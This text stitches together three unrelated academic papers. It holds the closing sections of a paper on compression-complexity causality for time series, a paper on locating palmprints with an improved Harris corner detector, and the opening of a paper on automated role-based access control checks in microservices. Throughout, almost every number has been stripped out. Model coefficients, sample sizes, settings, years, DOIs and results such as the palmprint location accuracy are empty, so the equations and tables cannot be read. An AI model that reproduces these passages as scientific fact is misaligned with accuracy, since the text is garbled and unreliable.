original                | .       | −.      | .      | .      | .      | .
filtered                | .       | .       | .      | .      | .      | .
decimated and filtered  | .       | .       | .      | .      | .      | .

from the table, we see that ccc can distinguish the direction of causality in the original case as well as in the filtering and the decimation plus filtering cases. erroneously, te shows significant causality in the direction opposite to causation upon filtering as well as upon decimation and filtering, and gc shows significant causality in the direction opposite to causation upon decimation and filtering. from this we can infer that ccc is highly suitable for practical applications which involve pre-processing such as filtering and decimation of measurements.
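the moving-average filtering and decimation pre-processing used in this experiment can be sketched as follows; the window length, step size and decimation factor are elided in the text, so the values below are placeholders.

```python
import numpy as np

def lowpass_and_decimate(sig, window=4, step=1, decimate=2):
    """moving-average low-pass filtering (and optional decimation) of a signal.

    window, step and decimate are placeholders for the paper's elided settings.
    returns the filtered signal and the decimated-plus-filtered signal.
    """
    kernel = np.ones(window) / window
    filtered = np.convolve(sig, kernel, mode="valid")[::step]
    return filtered, filtered[::decimate]

# both coupled signals would be processed identically before re-estimating
# ccc, te and gc on the filtered and decimated-plus-filtered versions.
```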
conditional ccc on short length mvar system
a system of three variables was simulated as per the following equations:

z(t) = . z(t−1) + ε_z,t
x(t) = . x(t−1) + . z(t−1) + ε_x,t
y(t) = . y(t−1) + . z(t−1) + ε_y,t

where the noise terms ε_z, ε_x, ε_y = νη, ν = noise intensity = . and η follows the standard normal distribution. the length of the time series simulated was and the first transients were removed to yield short length signals of time points. the coupling direction and strength between the variables x, y, z are shown in fig. (a). the mean values of causality estimated over trials using ccc, te and gc are shown in the tables of fig. (b), (c) and (d), respectively. ccc settings used: l= , w= , δ= , b= . in the tables, true positives are in green, true negatives in black, false positives in red and false negatives in yellow. ccc correctly detects the true positives and negatives. gc detects the true positives but also shows some false positive couplings. te performs very poorly, falsely detecting negatives where coupling is present and also showing false positives where there is no coupling.

figure. mean causality values estimated using ccc (b), te (c) and gc (d) for a system of three ar variables coupled as in (a). true positives are in green, true negatives in black, false positives in red and false negatives in yellow.

real data
ccc was applied to estimate causality on measurements from two real-world systems and compared with te. system (a) comprised short time series for the dynamics of a complex ecosystem, with point recordings of predator (didinium) and prey (paramecium) populations, reported in veilleux ( ) and originally acquired for jost & ellner ( ), with the first points from each series removed to eliminate transients (fig. a). length of signal on which causality is computed, n = ; ccc settings used: l= , w= , δ= , b= . ccc is seen to aptly capture the higher (and direct) causal influence from predator to prey population and the lower influence in the opposite direction (see fig. ). the latter is expected, owing to the indirect effect of the change in prey population on the predator. ccc results are in line with those obtained using convergent cross mapping (sugihara et al., ). te, on the other hand, fails to capture the correct causality direction.

system (b) comprised raw single-unit neuronal membrane potential recordings (v, in v) of squid giant axon in response to stimulus current (i, in v, v = µa/cm ), recorded in paydarfar, forger & clay ( ) and made available by goldberger et al. ( ). we test for the causation from i to v for three axons ( trial each) labeled 'a t ', 'a t ' and 'a t ', extracting , points from each recording. length of signal on which causality is computed, n = , ; ccc settings used: l= , w= , δ= , b= . we find that ccc(i→v) is less than or approximately equal to ccc(v→i) and both values are less than zero for the three axons (fig. ), indicating negative causality in both directions. this implies a bidirectional dependence between i and v. each brings a different dynamical influence on the other when compared to its own past. te fails to give consistent results for the three axons.

figure. ccc, te on real-world time series. (a) time series showing population of didinium nasutum (dn) and paramecium aurelia (pn) as reported in veilleux ( ), (b) stimulus current (i) and voltage measurements (v) as recorded from a squid giant axon ('a t ') in paydarfar, forger & clay ( ). (c) table showing ccc and te values as estimated for systems (a) and (b).

conclusions
in this work, we have proposed a novel data-based, model-free intervention approach to estimate causality for given time series. the interventional complexity causality measure (or icc), based on capturing causal influences from the dynamical complexities of data, is formalized as compression-complexity causality (ccc) and is shown to have the following strengths:

• ccc operates on windows of the input time series (or measurements) instead of individual samples. it does not make any assumption of the separability of cause and effect samples.
• ccc doesn't make any assumptions of stochasticity, determinism, gaussianity, stationarity, linearity or markovian property. thus, ccc is applicable even on non-stationary/non-linear/non-gaussian/non-markovian, short-term and long-term memory processes, as well as chaotic processes. ccc characterizes the causal relationship based on dynamical complexity computed from windows of the input data.

• ccc is uniquely and distinctly novel in its approach since it does not estimate 'associational' causality (first rung on the ladder of causation) but performs 'intervention' (second rung on the ladder of causation) to capture causal influences from the dynamics of the data.

• the point of 'intervention' (length l for creating the hypothetical data: ypast + x) is dependent on the temporal scale at which causality exists within and between processes. it is determined adaptively based on the given data. this makes ccc a highly data-driven/data-adaptive method and thus suitable for a wide range of applications.

• infotheoretic causality measures such as te and others need to estimate joint probability densities, which are very difficult to reliably estimate with short and noisy time series. on the other hand, ccc uses the effort-to-compress (etc) complexity measure over short windows to capture time-varying causality, and it is well established in the literature that etc outperforms infotheoretic measures for short and noisy data (nagaraj & balasubramanian, a; balasubramanian & nagaraj, ).

• ccc can be either positive or negative (unlike te and gc). by this unique property, ccc gives information about the kind of causal influence that is brought by one time series on another, whether this influence is similar (ccc > 0) to or different (ccc < 0) from the influence that the series brings to its own present.

• negative ccc could be used for 'control' of processes by intervening selectively on those variables which are dissimilar (ccc < 0)/similar (ccc > 0) in terms of their dynamics.

• ccc is highly robust and reliable, and overcomes the limitations of existing measures (gc and te) in the case of signals with long-term memory, low temporal resolution, noise, filtering, non-uniform sampling (non-synchronous measurements), finite length signals, presence of common driving variables, as well as on real datasets. we have rigorously demonstrated the performance of ccc in this work.

given the above listed novel properties of ccc and its unique model-free, data-driven, data-adaptive intervention-based approach to causal reasoning, it has the potential to be applied in a wide variety of real-world applications. future work would involve testing the measure on simulated networks with complex interactions as well as more real-world datasets. we would like to further explore the idea of negative ccc and check its relation to the lyapunov exponent (for chaotic systems), which can characterize the degree of chaos in a system. it is also worthwhile to explore the performance of other complexity measures such as lempel–ziv complexity for the proposed interventional complexity causality. we provide free open access to the ccc matlab toolbox developed as a part of this work. see section s for details.
list of abbreviations
ar: autoregressive
c(·): complexity
c(·,·): joint complexity
cc: dynamical compression-complexity
cc: averaged dynamical compression-complexity
ccc: compression-complexity causality
ccc: averaged compression-complexity causality
cr: complexity rate
dc: dynamical complexity
etc(·): effort-to-compress
etc(·,·): joint effort-to-compress
gc: granger causality
icc: interventional complexity causality
jsd: jensen–shannon divergence
kl: kullback–leibler divergence
lz: lempel–ziv complexity
mvar: multivariate autoregressive
te: transfer entropy

acknowledgements
aditi kathpalia is thankful to manipal academy of higher education for permitting this research as part of the phd programme.

additional information and declarations

funding
this work was supported by tata trusts and cognitive science research initiative (csri-dst) grant no. dst/csri/ / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: tata trusts and cognitive science research initiative (csri-dst): grant no. dst/csri/ / .

competing interests
the authors declare there are no competing interests.

author contributions
• aditi kathpalia and nithin nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability: in text s , we provide details of our proposed method compression-complexity causality (ccc). the text also provides details of the matlab toolbox for computation of ccc, made available as supplemental material.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
balasubramanian k, nagaraj n. . aging and cardiovascular complexity: effect of the length of rr tachograms. peerj :e doi . /peerj. .
barnett l, seth ak. . the mvgc multivariate granger causality toolbox: a new approach to granger-causal inference. journal of neuroscience methods : – doi . /j.jneumeth. . . .
barrett ab, barnett l. . granger causality is designed to measure effect, not mechanism. frontiers in neuroinformatics :article doi . /fninf. . .
bauer m, cox jw, caveness mh, downs jj, thornhill nf. . finding the direction of disturbance propagation in a chemical process using transfer entropy. ieee transactions on control systems technology ( ): – doi . /tcst. . .
baumöhl e, vỳrost t. . stock market integration: granger causality testing with respect to nonsynchronous trading effects. czech journal of economics & finance ( ): – .
budhathoki k, vreeken j. . causal inference by compression. in: ieee th international conference on data mining (icdm). piscataway: ieee, – .
chiou-wei sz, chen c-f, zhu z. . economic growth and energy consumption revisited: evidence from linear and nonlinear granger causality. energy economics ( ): – doi . /j.eneco. . . .
cilibrasi rl. . statistical inference through data compression. amsterdam: institute for logic, language and computation.
cover tm, thomas ja. . elements of information theory. hoboken: john wiley & sons.
dhamala m, rangarajan g, ding m. . estimating granger causality from fourier and wavelet transforms of time series data. physical review letters ( ): – doi . /physrevlett. . .
friston k, harrison l, penny w. . dynamic causal modelling. neuroimage ( ): – doi . /s - ( ) - .
glover gh. . overview of functional magnetic resonance imaging. neurosurgery clinics ( ): – doi . /j.nec. . . .
goldberger al, amaral la, glass l, hausdorff jm, ivanov pc, mark rg, mietus je, moody gb, peng c-k, stanley he. . physiobank, physiotoolkit, and physionet. circulation ( ):e –e doi . / .cir. . .e .
granger c. . investigating causal relations by econometric models and cross-spectral methods. econometrica ( ): – doi . / .
hiemstra c, jones jd. . testing for linear and nonlinear granger causality in the stock price-volume relation. the journal of finance ( ): – .
jost c, ellner sp. . testing for predator dependence in predator-prey dynamics: a non-parametric approach. proceedings of the royal society b: biological sciences ( ): – doi . /rspb. . .
kim s-g, richter w, uǧurbil k. . limitations of temporal resolution in functional mri. magnetic resonance in medicine ( ): – doi . /mrm. .
laguna p, moody gb, mark rg. . power spectral density of unevenly sampled data by least-square analysis: performance and application to heart rate signals. ieee transactions on biomedical engineering ( ): – doi . / . .
lempel a, ziv j. . on the complexity of finite sequences. ieee transactions on information theory ( ): – doi . /tit. . .
marinazzo d, pellicoro m, stramaglia s. . kernel method for nonlinear granger causality. physical review letters ( ): - – - doi . /physrevlett. . .
montalto a, faes l, marinazzo d. . mute: a matlab toolbox to compare established and novel estimators of the multivariate transfer entropy. plos one ( ):e doi . /journal.pone. .
mosedale tj, stephenson db, collins m, mills tc. . granger causality of coupled climate processes: ocean feedback on the north atlantic oscillation. journal of climate ( ): – doi . /jcli . .
nagaraj n, balasubramanian k. a. dynamical complexity of short and noisy time series. the european physical journal special topics : – .
nagaraj n, balasubramanian k. b. three perspectives on complexity: entropy, compression, subsymmetry. the european physical journal special topics ( ): – doi . /epjst/e - - .
nagaraj n, balasubramanian k, dey s. . a new complexity measure for time series analysis and classification. the european physical journal special topics ( – ): – doi . /epjst/e - - .
paydarfar d, forger db, clay jr. . noisy inputs and the induction of on–off switching behavior in a neuronal pacemaker. journal of neurophysiology ( ): – doi . /jn. . .
pearl j. . causality. cambridge: cambridge university press.
pearl j, mackenzie d. . the book of why: the new science of cause and effect. new york: basic books.
rissanen j. . modeling by shortest data description. automatica ( ): – doi . / - ( ) - .
schreiber t. . measuring information transfer. physical review letters ( ): – doi . /physrevlett. . .
seth ak, barrett ab, barnett l. . granger causality analysis in neuroscience and neuroimaging. journal of neuroscience ( ): – doi . /jneurosci. - . .
shannon ce. . a mathematical theory of communication, part i, part ii. the bell system technical journal : – doi . /j. - . .tb .x.
stips a, macias d, coughlan c, garcia-gorriz e, san liang x. . on the causal structure between co and global temperature. scientific reports :article doi . /srep .
sugihara g, may r, ye h, hsieh c, deyle e. . detecting causality in complex ecosystems. science ( ): – doi . /science. .
teplan m. . fundamentals of eeg measurement. measurement science review ( ): – .
veilleux bg. . the analysis of a predatory interaction between didinium and paramecium. master's thesis, university of alberta, edmonton.
vicente r, wibral m, lindner m, pipa g. . transfer entropy: a model-free measure of effective connectivity for the neurosciences. journal of computational neuroscience ( ): – doi . /s - - - .
virmani m, nagaraj n. . a novel perturbation based compression complexity measure for networks. heliyon ( ):e doi . /j.heliyon. .e .
wieczorek a, roth v. . causal compression. arxiv preprint. arxiv: . .
wiener n. . the theory of prediction. modern mathematics for engineers : – .

research on harris corner detection method in palmprint recognition system
wu hejing
east university of heilongjiang
e-mail: @qq.com

abstract—palmprint location is the premise of feature space extraction and feature recognition; the speed and accuracy of palmprint location directly affect the speed and accuracy of a palmprint recognition system, and the extraction of contour feature points is the key to palmprint location. the contour of the palmprint is extracted by gray morphological gradient; then, based on the analysis of palmprint appearance characteristics, harris corners are used to extract the key feature points of the image, and the reference coordinate system is established according to the key points to realize the location and segmentation of the palmprint.

keywords-palmprint recognition system; palmprint location; harris corner

i. extraction of contour feature points by improved harris corner detection method
figure . palmprint corner detection

the harris corner detection algorithm is a common corner extraction algorithm at present, but it cannot achieve an ideal effect when used directly to extract the contour feature points defined by us. as shown in figure , this paper improves the harris corner detection algorithm purposefully, thus realizing the extraction of palmprint contour feature points.

ii. harris corner detection
the predecessor of the harris algorithm is the moravec algorithm. in the standard formulation, the corner detection formula is

e(u, v) = Σ_(x,y) w(x, y) [ i(x + u, y + v) − i(x, y) ]²

where e is the brightness change that occurs when a small window is moved by (u, v) at a point (x, y), and w(x, y) is a gaussian smoothing factor. the essence of this formula is the autocorrelation of a two-dimensional signal. expanding the formula by a taylor series,

i(x + u, y + v) ≈ i(x, y) + i_x u + i_y v,

where i_x and i_y represent the horizontal and vertical derivatives at the point in the image, respectively. ignoring the higher order terms and writing the result in quadratic form gives

e(u, v) ≈ [u v] m [u v]ᵀ,  m = Σ_(x,y) w(x, y) [ i_x²  i_x i_y ; i_x i_y  i_y² ].

after similarity diagonalization of m, the eigenvalues of matrix m are obtained. because matrix m has rotation invariance and is proportional to the curvature of the gray scale at the pixel, a point is determined to be a corner point if the minimum eigenvalue is greater than a given threshold. the harris algorithm needs to determine a threshold, the variance of the gaussian function and the constant k. when the image size is , the window size of the derivative is , and the window size of the gaussian filter is , the complexity of the operator is , and the algorithm is slow.

iii. improvements of harris corner detection algorithms
in the harris algorithm, the eigenvalues of matrix m are closely related to the first derivatives of the pixel in the x and y directions. in an edge region, there is a large change only in the horizontal or the vertical direction, that is, only one of them is large; in flat areas, the changes in the horizontal and vertical directions are the smallest, that is, both are small; in a corner area, the changes in both the horizontal and vertical directions are large. according to this feature, the corner detection algorithm is improved. the feature points of the palmprint contour extracted by us are located in the convex and concave areas between the fingers on the palmprint contour. they are composed of some flat areas and points that vary within a certain range of slope areas. in an image region, the difference between the third row and the first row is close to the derivative in the y direction, and the difference between the third column and the first column is close to the derivative in the x direction. firstly, two templates dx and dy are designed. for any image region z, the derivatives of the center point z in the x and y directions can be defined, respectively.

figure . the image region

the input image is the palm edge image after thinning. according to the principles of image graphics, it is a closed curve composed of continuous single pixel points, and its gray value takes only two levels. a black edge point is defined as a response point and the white background as a non-response point; when there is no response point in the z region (that is, it is all white background), the response is zero. for the refined contour line, the corner function value c is calculated. in the case of c > 0, the candidate corner points are obtained.
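as a rough sketch of this idea, the following python fragment computes a harris-style response on a thinned binary contour using third-minus-first row and column differences as dy and dx; the smoothing window, the constant k and the thresholding rule are illustrative assumptions rather than the exact templates used by the author.

```python
import numpy as np
from scipy.ndimage import uniform_filter

def corner_response(edge, k=0.04):
    """harris-style corner response on a binary (0/1) thinned edge image.

    dx/dy approximate the derivatives as differences between the third and
    first column/row of each 3x3 region; k and the 3x3 box smoothing are
    placeholder choices for illustration only.
    """
    e = edge.astype(float)
    ix = np.zeros_like(e)
    iy = np.zeros_like(e)
    ix[1:-1, 1:-1] = e[1:-1, 2:] - e[1:-1, :-2]   # third column minus first
    iy[1:-1, 1:-1] = e[2:, 1:-1] - e[:-2, 1:-1]   # third row minus first
    ixx = uniform_filter(ix * ix, 3)              # sum products over a window
    iyy = uniform_filter(iy * iy, 3)
    ixy = uniform_filter(ix * iy, 3)
    det = ixx * iyy - ixy ** 2
    trace = ixx + iyy
    return det - k * trace ** 2

# candidate corners: contour pixels whose response exceeds zero
# c = corner_response(edge); candidates = np.argwhere((edge == 1) & (c > 0))
```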
as shown in figure (b), the x coordinate values of the candidate corner points are sorted and the candidate points are grouped into corner-point arrays; then the point with the maximum y value in each group is taken as the corner point we want, as shown in figure (c). in order to further verify the feasibility of this algorithm, we searched for some representative images to test the performance of the corner detection algorithm, such as pentagonal star edges and some building block edges, as shown in fig. (a), and detected the points that satisfy the condition c > 0 (i.e., the detected feature points). the results are shown in fig. (b).

figure . extraction of palmprint contour feature points

iv. extraction process of palmprint contour feature points
consistent with our previous deduction, the extracted set contains not only the points in the top corner areas but also the points on the edges of the inclined angle, above and below the horizontal line (as shown in the shadows of figure ).

figure . palmprint contour feature points
figure . declination range

the purpose of localization and normalization of the palmprint image is to extract appropriate reference points from the palmprint and establish a reference coordinate system, to reduce the influence of non-linear factors such as rotation, translation and distortion introduced in the sampling process, and to improve the robustness of the matching recognition algorithm. good positioning results can not only provide a reference frame for other palmprint features but also provide a benchmark for palmprint matching and feature matching. at the same time, it can segment the central area of the palmprint, reduce unnecessary noise interference, reduce the complexity of the subsequent matching algorithm, achieve azimuth-independent matching, and ensure the accuracy and effectiveness of the recognition system; it therefore has very important significance in a palmprint identification system.

figure . palmprint location and feature space extraction

after extracting the corner points, we set up the coordinate system according to the following steps: make the line l = k k ; draw an axis perpendicular to the line l from k and set it as the y axis; make a line l parallel to the line l through the crossing point k ; obviously this line is perpendicular to the y axis and can be defined as the x axis, with the intersection point of the x axis and the y axis as the o point, as shown in fig. (a). the palmprint image is rotated counter-clockwise about the o point, as shown in fig. (b), and then the central area of the palmprint is extracted and normalized as the palmprint feature space, as shown in fig. (c). under the above acquisition conditions, a palmprint test image database was established, composed of images with a size of * ( persons, each person providing images). the positioning accuracy is shown in table i. the experimental results show that the desired feature points can also be found for images with an unsatisfactory collection effect. among them, images can be located accurately according to the above algorithm, so the accuracy rate is . %.

table i. location results
total image count:
correct location number:
error location number:
location accuracy: . %

according to the analysis of the palmprint images, the main reasons for wrong location are insufficient extension of the palm, incorrect placement of the palm, or insufficient separation of the four fingers.
if the position and posture of the palm are further standardized, the error positioning rate can be further reduced. the experimental results show that the above method is simple, effective and fast, and can locate and score palmprints quickly and accurately.

v. conclusion
in this paper, a new and purposeful exploration is made on the extraction of contour feature points in palmprint images, and the harris corner detection algorithm is improved to realize the effective extraction of contour feature points. this algorithm avoids the need to determine the threshold artificially in the traditional corner detection algorithm, simplifies it, reduces the amount of calculation, groups candidate corners and takes only one feature point in each group, thus improving the robustness of the algorithm, and provides a new and effective method for solving the problem of palmprint location in palmprint recognition.

on automated rbac assessment by constructing a centralized perspective for microservice mesh
dipta das, andrew walker, vincent bushong, jan svacina, tomas cerny and vashek matyas
department of computer science, baylor university, waco, tx, usa
faculty of informatics, masaryk university, brno, czech republic

abstract
it is important in software development to enforce proper restrictions on protected services and resources. typically software services can be accessed through rest api endpoints where restrictions can be applied using the role-based access control (rbac) model. however, rbac policies can be inconsistent across services, and they require proper assessment. currently, developers use penetration testing, which is a costly and cumbersome process for a large number of apis. in addition, modern applications are split into individual microservices and lack a unified view in order to carry out automated rbac assessment. often, the process of constructing a centralized perspective of an application is done using systematic architecture reconstruction (sar). this article presents a novel approach to automated sar to construct a centralized perspective for a microservice mesh based on their rest communication pattern. we utilize the generated views from sar to propose an automated way to find rbac inconsistencies.
subjects security and privacy, software engineering
keywords microservices, rest, rbac, access control, authorization, security, static code analysis, systematic architecture reconstruction

introduction
with the software industry's growth, the complexity of security administration is becoming more and more challenging. as the current software development trend is moving rapidly from monolithic to microservice architecture (msa), we must address communication patterns not only for the simple client to server scenarios but also for service to service scenarios. since the client-server communication pattern has existed for many years, its security implications have already been well addressed. in contrast, not much has been studied for service-to-service communication patterns. currently, the most popular way to establish communication between services is to use representational state transfer (rest) (vural, koyuncu & guney, ; salah et al., ). developing a secured rest-based infrastructure is relatively easy for a smaller number of microservices. however, the security aspects gradually become more complex as the number of microservices grows. due to their high feature set and operational complexity, modern microservice-based applications tend to have a large number of individual microservices developed separately by separate teams. enforcing a robust security solution for such applications is tedious for developers and might lead to security disagreement among microservices. this is because individual developers only have an idea of a subset of microservices they maintain but lack an understanding of the overall picture. even system architects may not understand the complete picture of the application since many of those microservices may not be in the initial blueprint of the application but rather were added later. thus, we need to establish an automatic way to generate the overall communication pattern for the whole application before diving into the security aspects. this is done through a process of systematic architecture reconstruction (sar) in which overall views are constructed from existing application artifacts. sar is divided into four phases: extraction, construction, manipulation and analysis. in this article, we first introduce a solution for automatic sar of a microservice application, which generates a view of the microservices' rest communication pattern. by automating the first three phases of sar and utilizing the constructed views, we can focus on the analysis phase and present an approach to enumerate possible security loopholes in the application.
more specifically, we focused on finding role-based access control (rbac) inconsistencies among microservices using static code analysis. we present a case study on a single enterprise application called teacher management system (tms) consisting of four individual microservices. this application was developed separately but re-purposed here as a testbed for performing static code analysis. our work focuses on intra-and inter-microservice inconsistencies highlighting all possible rbac issues. an application’s core security requirement is to ensure that it can only be used by legitimate users (mohanty, mohanty & balakrishnan, ). rbac is one of the popular methods of securing rest services where each user of the application is assigned to a set of roles that grant access to different parts of the system. in microservice-based applications, there can be two different abstractions to enforce rbac rules. first, centralized among all the microservices and, second, per microservice-based. thus, next in this article, we focus on the centralized approach. finding inconsistencies among rbac rules in a large system is a cumbersome and difficult task due to different levels of abstractions, poor coding practices, and coupling with third-party services. according to a survey conducted in by the international data group (mohanty, mohanty & balakrishnan, ), about % of applications have not been tested for security vulnerabilities. this can be easily mitigated by enforcing standard security features during the regular software development process (mcgraw, ). ignoring such security vulnerabilities is expensive. security breaches can cost companies billions and require significant time and effort to resolve. for example, the ebay hack, which was caused by improper access control restrictions, impacted over million users (swinhoe, ). being able to list possible security vulnerabilities automatically can significantly reduce the likelihood of such incidents. system administrators should wisely choose the approaches to test the security vulnerability of the system. the most accurate outcome from such a test can be obtained via rigorous penetration testing. however, such an approach needs the application to be fully deployed, and running penetration tests against a production deployment could das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lead to disruption for end users. also, it is difficult to emulate all possible scenarios for penetration testing. in contrast, static code analysis can be a much easier alternative that does not require an application to be deployed and hence is more cost-effective. although static code analysis is no panacea, when carefully implemented, it can detect many vulnerabilities. it is for these reasons we use static code analysis for our automated sar process. the article is organized as follows. section two discusses the related work and state of the art. “proposed method” describes our proposed method in detail, and section four explores a case study. finally, we conclude our article by summarizing our work outcomes, describing our future goals, and listing the references. throughout the article, the terms “inconsistency”, “violation” and “issue” are used interchangeably to indicate a potential flaw. related work in this section, we present related work from the two different perspectives considered in this article. first, we assess the limitations of rbac analysis in the context of enterprise systems. 
next, we assess existing approaches for the sar. role-based access control in microservice-based applications, each microservice implements a subset of features. end-users or other microservices can access these features through an application programming interface (api). there are typically two main api development choices: rest and simple object access protocol (soap) (tihomirovs & grabis, ). while rest is an architecture for api development that works over standard http protocol, soap is just a protocol. for many years, soap was a standard approach for web service interfaces. however, it has been dominated by rest in recent years. according to stormpath, over % of public apis are designed using rest (hunsaker, ). the main advantage of rest compared to soap is its simplicity and ease of learning. rest is lightweight and hence better suited for a wide range of devices, including mobile devices (wagh & thool, ). apart from that, rest uses javascript object notation format which is faster to parse compare to extensible markup language used in soap (tihomirovs & grabis, ; castillo et al., ). securing rest api endpoints is generally easy when existing http security approaches are leveraged instead of implementing a new security model (sudhakar, ). securing rest endpoints involves both authentication and authorization (brachmann, dittmann & schubert, ). authentication is the process of verifying the credentials associated with a particular request. different enterprise applications use different strategies to authenticate incoming requests, such as basic authentication, token-based authentication, hash-based digest authentication, oauth, etc. (lee, jo & kim, ). on the other hand, authorization involves verifying whether a request connection is allowed to perform a particular action through a rest endpoint. mandatory access control, discretionary access control, attribute-based access control and rbac are popular approaches for enforcing authorization (sandhu & samarati, ). in this article, instead das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of authentication breaches, we focus on exploring and detecting possible authorization inconsistencies, specifically role-based authorization inconsistencies. role-based access control has been widely adopted as an alternative to classical discretionary and mandatory access controls because of its advancement in flexibility and detail of control (sandhu & samarati, ; sandhu et al., ). it regulates users’ access to information and system resources based on activities that users need to execute in the system and requires the identification of roles in the system (ahn & sandhu, ). rbac’s administrative capabilities have made it stand out from the alternative approaches because system administrators can statically or dynamically regulate user’s access by defining roles, role hierarchies, relationships, and constraints (ferraiolo, cugini & kuhn, ). for distributed systems, another advantage is that rbac administrative responsibilities can be divided into central and local protection domains (ferraiolo, cugini & kuhn, ). in the case of microservice-based applications, these can be translated into central policies for all associated microservices and per microservice- based policies. central rbac policies can be enforced by delegating authentication and authorization tasks to a separate identity management tool, such as red hat’s keycloak (red hat inc, a). 
on the other hand, individual microservices can carry out such policies using security features of underlying frameworks, such as spring-security for spring-based applications (scarioni & nardone, ). due to the high impact of security-related issues, much research and development have been done addressing role violations. ciuciu, tang & meersman ( ) described one such strategy where appropriate security annotations are recommended for developers based on the ontology extracted from the business information. however, since this recommendation strategy works only based on business information irrespective of source code, if the business information provided is flawed, then the recommendation will also be faulty. one similar study focused on finding security vulnerabilities of api implementations among different libraries based on security-sensitive events (srivastava et al., ). it finds discrepancies among security policies associated with the same api using a flow graph. the inherent drawback of this approach is that it requires multiple independent implementations of the same api, and it can not find which ones of whose multiple implementations are faulty. another research study described a model-based approach for testing access control rules based on consistency, completeness and redundancy (xu et al., ). it checks whether access control rules are consistent across the methods, whether they are unnecessarily repeated, and whether they covered all subset of permissions. however, the coverage of access control rules over a set of methods does not necessarily relate to security issues. in xu et al. ( ), the system under study does not allow a user to rent a book on maintenance due to the incompleteness of access control rules, which is more of a system flaw rather than a security issue. in contrast, our proposed method finds whether a user can access a resource-restricted by one rbac rule through an alternative path that has less restriction. the tool fixmeup (son, mckinley & shmatikov, ) proposed an automated way to fix access control issues in php applications using static code analysis. it automatically das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ edits the source code to resolve access control issues. although it seems compelling to automate the task, it might lead to syntax errors and might result in unintended consequences in case of false positives. on the other hand, our rbac tool pinpoints the location of possible inconsistencies in the source code without adversely affecting the codebase since it does not modify the source code while performing analysis. the most similar analysis to our proposed method has been described by walker et al. ( ). that tool performs static code analysis on enterprise java applications to find issues in rbac rules defined using security annotations. the key difference is that it only considers intra-microservice issues, while our method works for both intra- and inter- microservice issues, taking into account all the microservices that constitute the application. freudenthal et al. ( ) proposed a distributed rbac (drbac) mechanism that decentralizes the trust-management across multiple administrative domains. due to its distributive nature drbac is highly scalable for a large number of mutually anonymous users. it features third-party delegation that enables one authorized entity to entrust roles created by another entity. 
besides, it controls the access levels for the same resource by valued attributes. also, drbac presents continuous monitoring by utilizing a pub-sub model to ensure the validity of trust relationships for extended interactions. in this article, we do not assess such decentralized rbac techniques; rather, we assume that user authentication and role mapping are handled through a centralized service while individual microservices are responsible for the imposition of those roles on api endpoints.

separation of duties (sod) has been widely studied in the context of rbac. it ensures data integrity and fraud prevention by distributing critical tasks among multiple users (basin, burri & karjoth, ). it enforces that no single user can execute all actions, and thus any kind of fraudulent activity will require collusion among at least two users (habib et al., ). in rbac, sod can be either static or dynamic (sandhu, ). in the static separation of duties (ssd), constraints are enforced during the assignment of users to roles. on the other hand, in the dynamic separation of duties (dsd), constraints are activated on the roles within a user session (omicini, ricci & viroli, ). in this article, we are not considering the user assignments and user sessions. instead, we performed static code analysis that solely focused on a subset of ssd, including statically defined roles and role hierarchies.

software architecture reconstruction
although many studies address access control issues, most of them are focused on single-microservice or monolith applications. however, modern cloud-based applications are commonly designed as a set of microservices for better flexibility and scalability (salah et al., ). the key challenge in performing a holistic analysis across multiple microservices is the automated construction of the application's centralized perspective. sar extracts a representation of software architecture from source code or documentation through an iterative reverse engineering process (bass, clements & kazman, ).
in mde, models are used as first-class entities to depict an efficient representation of the software architecture (cicchetti et al., ). alshuqayran, ali & evans ( ) described a manual analysis through the mde approach to reconstruct the architecture of microservice-based open-source projects. they defined a metamodel which is then mapped to the architecture using mapping rules. the metamodel and mapping rules are initially created for one system and then refined and validated using seven additional systems. however, the authors did not apply their reconstruction strategy to answer specific questions. ibrahim, bozhinoski & pretschner ( ) proposes an approach to derive msa module topology from container-based deployment configuration files, more specifically, from docker compose files. in addition to topology, they extracted the attack graph, a directed acyclic graph, to identify attack paths that lead to vulnerability exploitation. their implementation is based on a open-source vulnerability scanner for docker containers named clair (quay, ). the microart tool described by granchelli et al. ( ) extracts the deployment architecture of a microservice-based system from the source code repository. it utilizes a domain-specific language to represent key elements of the architecture by using the mde approach. it employs runtime log analysis to discover containers, network interfaces, and service interactions. however, users need to provide a reference to the container engine since microart does not automatically detect it from deployment configuration files. our proposed method reconstructs msa architecture based on the rest communication pattern, similar to the service modeling described by rademacher, sachweh & zündorf ( ). however, unlike that system, which depends on a service modeling language (rademacher et al., ), our reconstruction is solely based on static code analysis and works independently. das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed method enterprise applications are typically organized into a three-layer structure: controller layer, service layer, and repository layer. it is also common to organize microservices into the presentation layer, business layer, persistence layer, and database layer (richards, ). these two commonly used structures essentially indicate the same strategy. the presentation layer maps to the controller layer, which defines api endpoints, and the business layer maps to the service layer, which contains business logic. the persistence layer maintains data access objects to interact with the database layer (alur et al., ). these two layers (persistence and database) are consolidated into the repository layer in the three-layer architecture (richards, ; steinegger et al., ). microservices typically communicate over rest apis (salah et al., ). each microservice’s controller layer defines the rest endpoints that serve as request entry points for that particular microservice. requests are delegated from the controller layer to the service layer. the service layer typically implements business logic. it processes the request and generates an appropriate response. the service layer can also incorporate with the persistence layer to store and retrieve data relevant to a specific request. however, sometimes the service layer depends on other microservices to process the request. 
